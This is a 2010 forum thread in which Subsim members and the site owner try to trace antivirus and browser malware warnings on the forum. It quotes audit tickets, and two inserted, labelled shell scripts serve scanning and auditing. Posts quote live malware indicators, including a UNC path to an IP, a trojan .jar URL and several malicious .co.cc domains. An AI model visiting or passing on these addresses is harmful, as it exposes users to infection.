
Onkel Neal
10-05-10, 10:25 PM
I don't think there was an issue, there was something with the java script that was triggering some AV systems, not all of them. I checked all the forum files and none were "infected". I also replaced the forum system files with new copies, just to be sure. My tech finally sent in his report:

When we looked at your server and ran a shell scan nothing was found, everything looked good and we simply upgraded the rest of your system packages that were outdated. I can appreciate though that the delays are not good, our sales queue unfortunately is extremely low priority at the moment so will go ahead and close this ticket.

Since it took so long for him to get with me, I also hired the datacenter advance support to go through the server with a fine tooth comb:

Hello,
Our system administrators will begin the initial security audit and hardening for your server in 24 hours. During our initial audit our system administrators will do the following:
-Disable insecure services currently running and/or enabled
-Delete unnecessary user accounts
-Harden the SSH daemon (*nix systems)
-Secure mounted partitions
-Install and configure a software firewall (if you do not already have one installed or use an external firewall)
-Check running processes for insecure, unnecessary, or rogue processes
-Update the system kernel (*nix systems)
-Run a port scan to check for vulnerabilities
-Install and run a Rootkit check
-Run a system wide trojan detection task (including your forums)
-Update outdated services (this will vary depending on your current system configuration)
-Harden PHP by enabling SUHosin (This will not be performed unless you have cPanel, Plesk or DirectAdmin installed)
We will also perform ongoing security checks in maintenance which include:
Monitoring the Exim/Qmail queue
Perform audits with McAfee, Symantec, F-Secure, and Norton Anti-Virus systems.
Conducting Monthly Audits (similar to the initial audit described above)

***IMPORTANT***
If you have any custom applications running on the server (such as remote backup via CDP, a gaming server application, custom Apache configuration, etc. ) please reply to this ticket IMMEDIATELY so that our system administrators know about your custom software or configuration. This will allow us to configure our initial security audit to take your custom server configuration into account, ensuring that all of your applications continue to work correctly.
If we do not hear back from you within 24 hours, our administrators will assume that you have a default server configuration and would like all of the security precautions mentioned above enabled and/or installed on your server.
An initial audit report will be e-mailed to you once it has been completed. If you have any questions or comments please reply to this ticket. Thank you!
Regards,
Advanced Services Team
http://www.theplanet.com/

The server is clean, so I can't say what the problem was. I do appreciate the alerts, it's better to be safe than sorry.

Catfish
10-07-10, 08:01 AM
Hello,
sorry, but since yesterday, October 6th, the red screen is present again (Germany here).
Switching "off" the so-called smart screen filter in IE8, the red window does not come up. Switch the smart screen filter to "on", and the red window appears. Strange enough testing the site via smart screen filter tells me that the site is safe. And then the red window comes up again.

Seems the site has been added to a list at MS, don't know why though

Maybe a direct request at MS ?

Greetings,
Catfish

SeaWolf U-57
10-07-10, 08:04 AM
java download link is back

Magic1111
10-07-10, 01:10 PM
The problem is still with me ....!

http://img801.imageshack.us/img801/1040/bild003h.jpg (http://img801.imageshack.us/i/bild003h.jpg/)


I've had the same problem for days....!

Best regards,
Magic

Dowly
10-07-10, 01:45 PM
G35Driver's forums have the same issue as above, definitely a Trojan.

Neal, here's the Trojan URL (as it seems to be quite hard to read from the above image):

\\91.188.60.234\public\photo1.jpg

stabiz
10-07-10, 06:51 PM
Yep, it's back and it's in the ads.

SeaWolf U-57
10-08-10, 02:23 AM
91.188.60.234 server don’t look like that’s in America :o


http://img841.imageshack.us/img841/2518/ssrdirect.png


I wonder if that’s a members I.P also :hmmm:

Dowly
10-08-10, 02:32 AM
Sagade Ltd is still evil
http://www.computersecurityarticles.info/security/sagade-ltd-is-still-evil/

Onkel Neal
10-08-10, 10:31 PM
I wish this would happen on my computer so I would know what you're talking about. How is this "in the ads"? What ads? Only in the forum? Which style? I removed the flash ad.

Onkel Neal
10-08-10, 11:03 PM
After reading the forum Dowly mentioned, I saw something about Google analytics, so I have removed that from SmartDark, and looked out the other styles. Please let me know if the problem persists.

Onkel Neal
10-09-10, 06:55 AM
10-9-10 update:
Hello Neal,

A virus scan on your account does not show anything suspicious:

root@server2 [/home/subsimc/public_html/radioroom]# find -type f -not -name "*.7z" -not -name "*.rar" -not -name "*.zip" | sed 's/ /\\ /g' | xargs clamscan -i
xargs: unmatched single quote; by default quotes are special to xargs unless you use the -0 option

----------- SCAN SUMMARY -----------
Known viruses: 841714
Engine version: 0.96.3
Scanned directories: 0
Scanned files: 2347
Infected files: 0
Data scanned: 14.03 MB
Data read: 8.27 MB (ratio 1.70:1)
Time: 5.846 sec (0 m 5 s)

I am also unable to find any reference to the URL your client is complaining about or hidden functions that could provide a vector of attack in your site's code or database (except for thread 175495).

As such, the context clues suggest that they are suffering from a localized infection that will need to be removed using a virus scanner.

The only contraindication to this is that some browsers are reporting that the site is unsecure (though mine did not). If this continues, we'll need the exact URL that is causing the issue and the referring URL if they clicked through to your site so that we can attempt to reproduce the issue.

Regards,
Adam VanKirk
Systems Administrator, Advanced Services
RHCE, Security+


Anyone have the exact URL and referring URL mentioned above?
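The scan quoted in the ticket above printed an xargs quoting error: xargs stops reading its file list at a name with an unmatched quote, so the scanner is not handed every file. Added example (not from the thread or the hosting provider) of the same file selection with NUL-separated names, as the xargs message suggests; `scan_tree`, `files_reached` and the sample tree are constructed for illustration, and a harmless stand-in replaces `clamscan -i` so it runs without ClamAV:

```shell
#!/bin/sh
# Added example. Function names and the sample tree are constructed.

# Run a scanner command over every regular file under DIR, skipping the same
# archive types as the quoted command. NUL-separated names survive spaces,
# quotes and newlines, so no file is dropped from the scan.
# usage: scan_tree DIR SCANNER [ARGS...]
scan_tree() {
    dir=$1; shift
    find "$dir" -type f ! -name '*.7z' ! -name '*.rar' ! -name '*.zip' -print0 |
        xargs -0 "$@"
}

# The pipeline from the quoted ticket, kept only for comparison.
scan_tree_naive() {
    dir=$1; shift
    find "$dir" -type f ! -name '*.7z' ! -name '*.rar' ! -name '*.zip' |
        sed 's/ /\\ /g' | xargs "$@" 2>/dev/null || true
}

# Count how many file names a pipeline actually hands to the scanner.
# The stand-in scanner prints one line per argument it receives.
# usage: files_reached scan_tree|scan_tree_naive DIR
files_reached() {
    "$1" "$2" sh -c 'for f in "$@"; do echo x; done' sh | wc -l | tr -d ' '
}

# Constructed web root: three scannable files, one excluded archive.
make_sample_tree() {
    d=$(mktemp -d)
    : > "$d/index.php"
    : > "$d/two words.php"
    : > "$d/it's here.php"      # the kind of name that trips plain xargs
    : > "$d/backup.zip"         # excluded, as in the original command
    printf '%s\n' "$d"
}

tree=$(make_sample_tree)
echo "find -print0 | xargs -0 reached: $(files_reached scan_tree "$tree") of 3 files"
echo "find | sed | xargs reached:      $(files_reached scan_tree_naive "$tree") of 3 files"
rm -rf "$tree"
```

With ClamAV installed, the equivalent call is `scan_tree /path/to/webroot clamscan -i`.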

KeineK
10-09-10, 10:50 AM
Avast reports the domain as "drerlre.co.cc"

SeaWolf U-57
10-09-10, 12:09 PM
Avast reports the domain as "drerlre.co.cc"

I have never seen the red screen but I have seen the trojan message for drerlre.
I do not click on anything to bring up the message to download it jumps out as soon as I enter the site.
A localized infection, no; something is tagged to this site through whatever means. Check out the advert to the left of the screen, it changes with whatever browser you use. I don't mean the advert itself but the look of the border

Dowly
10-09-10, 12:24 PM
Nope, can't be global issue as I and many others have no issue with the site.

SeaWolf U-57
10-09-10, 12:28 PM
Nope, can't be global issue as I and many others have no issue with the site.

Crap I hate it when you just have a rant and then you find a possible reason for it that is nothing to do with this site directly :nope:

SeaWolf U-57
10-09-10, 12:32 PM
Nope, can't be global issue as I and many others have no issue with the site.

May I ask if you have a bookmark saved for this site, and if it goes to the forums direct, what is the saved URL address?

Edit ... I don't mean what shows at the top of the page the save in your bookmarks url

Dowly
10-09-10, 12:48 PM
May I ask if you have a bookmark saved for this site, and if it goes to the forums direct, what is the saved URL address?

Edit ... I don't mean what shows at the top of the page the save in your bookmarks url

http://www.subsim.com/radioroom/index.php

SeaWolf U-57
10-09-10, 01:28 PM
http://www.subsim.com/radioroom/index.php

I wonder :hmmm:

http://img163.imageshack.us/img163/278/sortcut.jpg

Dowly
10-09-10, 02:23 PM
Tried that URL, it just redirects to:
http://www.subsim.com/index.php

SeaWolf U-57
10-09-10, 03:18 PM
Tried that URL, it just redirects to:
http://www.subsim.com/index.php

Exactly but if you watch the page open you will see for just a second another page opening before the re-direct it’s just a possibility perhaps :hmmm:

Dowly
10-10-10, 08:14 AM
It's just a window notifying that:

"Subsim Forums converted to
vBulletin Sun May 28; Go here:
http://www.subsim.com/radioroom/"

Onkel Neal
10-10-10, 09:21 AM
Don't get me wrong, I am absolutely open to checking the forum for any problems, and will continue to do so, if the symptoms become more widespread. So far, though, two independent server techs (expensively) researched the forum, the domain, and server and no one has anything to report. I am also researching forums like the one Dowly listed and other vB forums for similar issues and how to detect a problem.

KeineK
10-11-10, 09:37 AM
I'm not getting the alert anymore.

kiwi_2005
10-11-10, 12:53 PM
First does anyone use Malwarebytes full version and get this complaint while browsing in subsim.

I enabled the full version of Malwarebytes just few days back where online monitoring is enabled. Before that I was running the free version where online scanning is disabled. When ever I come into Subsim malwarebytes goes nuts!

comes up with this message while in subsim: Malwarebytes successfully blocked access to potentially malicious website 77.78.240.27 (tyqudaf.co.cc)

Every link I click on, it loads into the page, then I get the warning bells about 77.78.240.27. Then today Malwarebytes blocks webpages on subsim!?? I was just in General, clicked on a link and I get the RPOD (Red page of death <I just made that up, see image below :)) I choose proceed anyway as I don't think subsim is sending out malware, more a false than real.

But anyway I just spent the last 10min searching out the IP 77.78.240.27 it complains about that's connected with Subsim, where it's located as coming from Sarajevo, Bosnia and Herzegovina??

Malwarebytes is updated and is a trustworthy anti-malware. But I think they have flunked on this one. Just wondering why the hell it's going nuts.

blocked out!
http://img413.imageshack.us/img413/5729/1012201054715am.jpg

Target co-ordinates identified. Send stealth bombers to this destination

http://img843.imageshack.us/img843/8975/1012201061213amm.jpg

Dowly
10-11-10, 01:01 PM
We got a thread about these trojans here (http://www.subsim.com/radioroom/showthread.php?t=175495&page=8). (Probably a good idea to rename the title to something trojan something :hmmm:)

That's now 3rd trojan that people have reported. Neal's two (expensive :O:) experts have scanned SS and found nothing.

Avast doesn't seem to recognise anything coming from the url you mentioned, seems like the account has been suspended so might be it just warns you as it has been a trojan site in the past. Firefox recognises the site as potentially harmful, tho.

kiwi_2005
10-11-10, 01:09 PM
We got a thread about these trojans here (http://www.subsim.com/radioroom/showthread.php?t=175495&page=8). (Probably a good idea to rename the title to something trojan something :hmmm:)

That's now 3rd trojan that people have reported. Neal's two (expensive :O:) experts have scanned SS and found nothing.

Avast doesn't seem to recognise anything coming from the url you mentioned, seems like the account has been suspended so might be it just warns you as it has been a trojan site in the past. Firefox recognises the site as potentially harmful, tho.

Ahh okay, thanks Dowly for the update. I clicked back in this link and got blocked :dead: lol. I will have to either turn off Malwarebytes before I come into subsim or answer "proceed anyway" on every link I enter so Malwarebytes will recognise not to block me every time.

Oh well good to know. :salute:

STEED
10-11-10, 01:31 PM
I'm running the free version and every time I've been here since last week it blocks a Trojan. As this is a site that take this sort of thing seriously I tend to think its more likely a false positive.

stoppro
10-11-10, 01:43 PM
I got a virus alert when opening a PM this morning. I'm running AVG.

kiwi_2005
10-12-10, 01:21 PM
I'm running the free version and every time I've been here since last week it blocks a Trojan. As this is a site that take this sort of thing seriously I tend to think its more likely a false positive.

You sure you have the free version, Steed? The free version doesn't monitor your internet activities, that's why I went full to unlock it. You probably have the full version.

Just realised Malwarebytes only kicks in and complains about subsim when I'm using Chrome - when I'm using Firefox, Malwarebytes doesn't complain about this site. :hmmm: Weird.

virtualpender
10-15-10, 09:50 PM
I'm having the exact same issue with Chrome but no alerts with IE. What's going on?

STEED
10-16-10, 01:05 PM
You sure you have the free version Steed

Yep...but a boo boo by me. :oops:

Its my free Avast that has been alerting me.

Rhodes
10-17-10, 08:26 AM
After some weeks without anything, another AV warning when entering the forum.
http://img69.imageshack.us/img69/5488/92402498.jpg (http://img69.imageshack.us/i/92402498.jpg/)

From the log: 17-10-2010 14:16:52 HTTP filter file http://vcfrt.com/01/vuujumsp/ksa.jar a variant of Java/Agent.A trojan connection terminated - quarantined RHODES\Administrador Threat was detected upon access to web by the application: C:\Programas\Java\jre6\bin\java.exe.

The java console pop up also.

Using NOD32!

Dowly
10-18-10, 01:31 PM
Started getting the red screen notifying that Subsim might be harmful site etc.
This what the google diagnostic page says (partly translated from finnish):
What happened when Google visited this site?
- During the past 90 days 401 pages were tested (at Subsim/radioroom), of which 14 pages loaded malicious software without permission from the user. Google visited this page the last time on 2010-10-18 and suspicious content was found on 2010-10-18.
Malicious software includes 9 exploit(s), 7 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software was found coming from 5 different networks, such as tyqudaf.co.cc/, vifyxoq.co.cc/, rrcch.com/.

Also, none of the smileys and the buttons for bold/italic text, quotes, hyperlinks etc. are working atm.

PS. I only get this with Firefox, IE still works and gives no warning about the site for some reason. :hmmm:

EDIT: Might add that Avast isn't actually spotting any trojans when I get this 'attack site' warning.

virtualpender
10-18-10, 01:45 PM
In addition to getting alerts from Malwarebytes and Chrome, Google is now reporting the following:

What happened when Google visited this site?
Of the 401 pages we tested on the site over the past 90 days, 14 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-10-18, and the last time suspicious content was found on this site was on 2010-10-18. Malicious software includes 9 exploit(s), 7 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including tyqudaf.co.cc/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=tyqudaf.co.cc/&client=googlechrome&hl=en-US), vifyxoq.co.cc/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=vifyxoq.co.cc/&client=googlechrome&hl=en-US), rrcch.com/ (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=rrcch.com/&client=googlechrome&hl=en-US).
This site was hosted on 1 network(s) including AS21844 (THEPLANET) (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS:21844&client=googlechrome&hl=en-US).

stringy
10-18-10, 02:21 PM
I have got Opera installed that seems to run with no problems. Also having issues with Firefox and that warning message so I will be swapping browsers for a while. This is the second time around for me.

gimpy117
10-18-10, 02:25 PM
Google Chrome just told me twice that "this site appears to be hosting malware"
just a heads up.

Oberon
10-18-10, 02:35 PM
http://www.subsim.com/radioroom/showthread.php?t=176196

Dowly
10-18-10, 02:36 PM
We got at least 3 threads about this already.
Just a heads up. :03:

Magic1111
10-18-10, 03:05 PM
I have got Opera installed that seems to run with no problems. Also having issues with Firefox and that warning message so I will be swapping browsers for a while. This is the second time around for me.

Yes, the Virus warning Problem goes on (with Firefox for example), look here:

http://img69.imageshack.us/img69/8190/bild119l.jpg (http://img69.imageshack.us/i/bild119l.jpg/)

http://img32.imageshack.us/img32/2086/bild120fh.jpg (http://img32.imageshack.us/i/bild120fh.jpg/)


Is it not possible to solve the problem?

Best regards,
Magic

Rhodes
10-18-10, 04:23 PM
We got at least 3 threads about this already.
Just a heads up. :03:

Yes, it's like the malware and so, they spread...:D

FIREWALL
10-18-10, 04:44 PM
Any way to increase the post count. :haha:

krashkart
10-18-10, 04:54 PM
Any way to increase the post count. :haha:

+1 http://www.subsim.com/radioroom/picture.php?albumid=258&pictureid=2293

krashkart
10-18-10, 04:58 PM
Nothing is impossible, only highly improbable. (Adam Savage) :know:

Cross your fingers and hope for the best. :)

Shiplord
10-18-10, 06:42 PM
While this forum loads, the top right banner of "Iron-Clads" loads data from the developer site totemgames.ru. That site is hosted on IP: 195.208.0.15 and 195.208.0.15 is often listed on several malware-site lists.

Dowly
10-18-10, 06:48 PM
Don't think it's that. There's plenty of legit sites there too. Besides, AV's would go crazy if something was coming from there.

Gut Wrench
10-18-10, 09:09 PM
I was directed to this link

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.subsim.com/radioroom/showthread.php?t=129059

Thrair
10-19-10, 02:20 AM
Title says it all. Firefox is telling me this site's been listed as an attack site. The hell? Was the site hacked or something recently?


I'm rather confused.

Armistead
10-19-10, 03:00 AM
Haven't heard or seen anything, my guess is it's on your end, software or possible spamware, etc. Doubt a virus is going on, but check it. Many times sites will place crap in your PC telling you you're under attack, getting a virus, etc., prompting you to use whatever program they have showing your problems, beware....Use a good free virus/spamware software like Avast.

So, I can't say, try rebooting your browser and see what happens

Seeadler
10-19-10, 07:09 AM
While this forum loads, the top right banner of "Iron-Clads" load data from the developer site totemgames.ru.

It doesn't load data from totemgames.ru, but the banner here has a link to totemgames.ru, and Firefox, IE8 and other browsers running in safe-mode check all links on a website for whether they refer to an IP classified as unsafe.

You are right, totemgames.ru refers to IP 195.208.0.15 and this IP is momentary blacklisted.

If I run Malwarebytes 1.46 with active web-check on and click on this link: http://www.totemgames.ru
the connection is blocked and reported as unsafe site
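Whether a page loads content from a third-party host or only links to it, the distinction drawn in the posts above, can be checked from a saved copy of the page source. Added example (not from any poster or from the site's code); `offsite_refs`, the sample page and its hosts are constructed, and `forum.example` stands in for the site's own domain:

```shell
#!/bin/sh
# Added example. Names, hosts and the sample page are constructed.

# offsite_refs FILE OWN_DOMAIN
# Lists hosts outside OWN_DOMAIN referenced by the saved HTML in FILE:
#   loaded HOST  - fetched automatically (script/img/iframe src, <link href>)
#   linked HOST  - only a hyperlink target (<a href>, <area href>)
offsite_refs() {
    tr '\n\t' '  ' < "$1" | grep -Eo '<[A-Za-z][^>]*>' |
    awk -v own="$2" -v q="'" '
    BEGIN { re = " (src|href)[ ]*=[ ]*[\"" q "]?(https?:)?//[^/\"" q " >?#]+" }
    {
        tag = tolower($0)
        if (!match(tag, re)) next              # no attribute naming a host
        ref = substr(tag, RSTART + 1, RLENGTH - 1)
        name = tag; sub("^<", "", name); sub("[ />].*$", "", name)
        attr = ref; sub("[ =].*$", "", attr)   # src or href
        host = ref; sub("^[^/]*//", "", host)  # drop attribute, quote, scheme
        sub("^.*@", "", host); sub(":[0-9]+$", "", host)
        n = length(host) - length(own)
        if (host == own || (n > 0 && substr(host, n) == "." own)) next
        kind = (attr == "href" && (name == "a" || name == "area")) ? "linked" : "loaded"
        print kind, host
    }' | sort -u
}

# Constructed page: own stylesheet and banner image, one off-site script,
# one off-site iframe, and a banner that only links to a vendor site.
make_sample_page() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
<html><head>
<link rel="stylesheet" href="http://forum.example/style.css">
<script src="http://stats.example.net/track.js"></script>
</head><body>
<a href="http://vendor.example.org/game"><img
   src="http://forum.example/images/banner_468x60.png"></a>
<iframe src="//ads.example.net:8080/slot?id=1"></iframe>
<a href="/radioroom/index.php">Forums</a>
</body></html>
EOF
    printf '%s\n' "$f"
}

page=$(make_sample_page)
offsite_refs "$page" forum.example
rm -f "$page"
```

This only sees references written into the HTML; a URL assembled at run time by script does not appear in the saved source and needs a capture of the browser's requests instead.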

Herr-Berbunch
10-19-10, 07:17 AM
Me too, this time I'm not just getting the single trojan report I had a couple of weeks ago, I'm getting what others got which is blocking every single page.

http://farm5.static.flickr.com/4084/5096630674_2255b52360_b.jpg

http://farm5.static.flickr.com/4145/5096033849_3109052834_b.jpg

I'm using Firefox 3.6.10, McAfee VirusScan 8.7.0i, and the latest free versions of SuperAntiSpyware and Malwarebytes. All of which I'm now going to use :nope:

Hydra
10-19-10, 08:08 AM
I'm getting the same "attack site" warning from Firefox.

WarlordATF
10-19-10, 08:26 AM
Check the General Topics forum, it's happening to everyone using Firefox or Google Chrome.

Sailor Steve
10-19-10, 10:24 AM
:yep:

There are now five or six threads on this now in various parts of the forum.

Herr-Berbunch
10-19-10, 10:50 AM
And an announcement from Neal!

Keep calm Captain Mainwaring!

Onkel Neal
10-19-10, 11:37 AM
@Seeadler, For now, I've changed the Ironclads link to a google search result for Totem games. I'm pretty sure Totem is 100% safe and legit, but the connection to a Russian IP may be causing this mess.

DarkFish
10-19-10, 06:39 PM
Today when visiting subsim.com (main page) I got a warning saying:

Accessed file is infected
Threat was blocked!
File name: clickfiles.co.cc/download/js.php
Threat name: Exploit JavaScript Obfuscation (type 1512)
Browser: Firefox
AV: AVG Free

I got this same warning a while back too (about a week ago I guess) and haven't had it again until now, so I don't think it's got anything to do with subsim itself. I suspect something in the ads:

The ad that currently shows up in the top right corner is the Ironclads one. While reviewing the source code for the main page, I found out that the image loads from http://www.subsim.com/radioroom/images/TotemGames_Ironclads_banner_468x60.png. Every time I open this link in firefox, instead of the image I get an AV warning (the "Reported Attack Page" one that everyone is showing). IE just loads the image without any warnings. Don't know if my IE has got an AVG extension though.


EDIT: I'm getting this problem 50% of the time I visit any subsim page now! This is getting really annoying!

Onkel Neal
10-23-10, 07:40 AM
For future posts, please use this thread
http://www.subsim.com/radioroom/showthread.php?t=175495&page=10